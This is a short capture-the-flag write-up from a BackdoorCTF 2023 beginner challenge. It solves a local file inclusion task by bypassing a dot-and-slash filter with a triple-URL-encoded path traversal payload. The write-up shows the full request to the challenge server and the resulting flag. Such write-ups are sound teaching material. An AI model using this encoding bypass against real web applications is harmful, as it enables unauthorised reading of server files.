CTFtime.org

Beginner/secret_of_j4ck4l j4ck4l

by zer0d4y / No[va]Sec

Tags: backdoor 

Rating:

## Beginner/secret_of_j4ck4l

![image](https://github.com/zer00d4y/writeups/assets/128820441/69b19377-2173-46ff-b3e0-05ad52c33cc3)

Simple LFI, but you need to consider filters, which remove ' . ' and ' / '

We need to use this payload: %25252e%25252e%25252fflag%25252etxt

http://34.132.132.69:8003/read_secret_message?file=%25252e%25252e%25252fflag%25252etxt

GET /read_secret_message?file=%25252E%25252E%25252Fflag%25252Etxt HTTP/1.1
Host: 34.132.132.69:8003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/Redacted Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

![image](https://github.com/zer00d4y/writeups/assets/128820441/21e53ec7-28c2-400c-85ca-da7d9be2fd0d)

FLAG: `flag{s1mp13_l0c4l_f1l3_1nclus10n_0dg4af52gav}`

Original writeup (https://github.com/zer00d4y/writeups/blob/main/CTF%20events/BackdoorCTF/BackdoorCTF_2023.md).

Comments